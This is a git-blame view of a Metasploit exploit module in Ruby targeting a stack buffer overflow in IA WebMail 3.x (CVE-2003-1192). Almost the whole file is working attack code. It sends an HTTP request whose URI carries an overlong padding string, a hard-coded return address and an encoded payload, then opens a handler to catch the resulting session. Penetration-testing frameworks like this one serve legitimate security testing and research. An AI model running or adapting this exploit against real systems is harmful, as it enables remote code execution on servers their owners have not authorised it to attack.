Files
metasploit-gs/modules/exploits/windows/http/ia_webmail.rb
T

Ignoring revisions in .git-blame-ignore-revs. Click here to bypass and see the normal blame view.

63 lines
1.6 KiB
Ruby
Raw Normal View History

##
2017-07-24 06:26:21 -07:00
# This module requires Metasploit: https://metasploit.com/download
2013-10-15 13:50:46 -05:00
# Current source: https://github.com/rapid7/metasploit-framework
##
2016-03-08 14:02:44 +01:00
class MetasploitModule < Msf::Exploit::Remote
2009-12-06 05:50:37 +00:00
Rank = AverageRanking
2006-10-03 05:42:34 +00:00
include Msf::Exploit::Remote::HttpClient
2006-10-03 05:42:34 +00:00
def initialize(info = {})
super(update_info(info,
2006-10-03 05:42:34 +00:00
'Name' => 'IA WebMail 3.x Buffer Overflow',
'Description' => %q{
2010-05-09 17:45:00 +00:00
This exploits a stack buffer overflow in the IA WebMail server.
2006-10-03 05:42:34 +00:00
This exploit has not been tested against a live system at
this time.
},
'Author' => [ 'hdm' ],
'References' =>
[
2006-11-28 17:18:43 +00:00
[ 'CVE', '2003-1192'],
[ 'OSVDB', '2757'],
[ 'BID', '8965'],
2006-10-03 05:42:34 +00:00
[ 'URL', 'http://www.k-otik.net/exploits/11.19.iawebmail.pl.php'],
],
'Privileged' => false,
'Payload' =>
{
'Space' => 1024,
'DisableNops' => true,
'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
},
'Platform' => 'win',
'Targets' =>
[
2006-10-03 05:42:34 +00:00
[
'IA WebMail 3.x',
{
'Ret' => 0x1002bd33,
'Length' => 1036
},
]
],
2020-10-02 17:38:06 +01:00
'DisclosureDate' => '2003-11-03',
2006-10-03 05:42:34 +00:00
'DefaultTarget' => 0))
end
def exploit
print_status("Sending request...")
2006-12-28 23:42:36 +00:00
send_request_raw({
'uri' =>
2006-10-03 05:42:34 +00:00
"/" + ("o" * target['Length']) +
"META" +
[target.ret].pack('V') +
2006-12-28 23:42:36 +00:00
payload.encoded
}, 2)
2006-10-03 05:42:34 +00:00
handler
end
end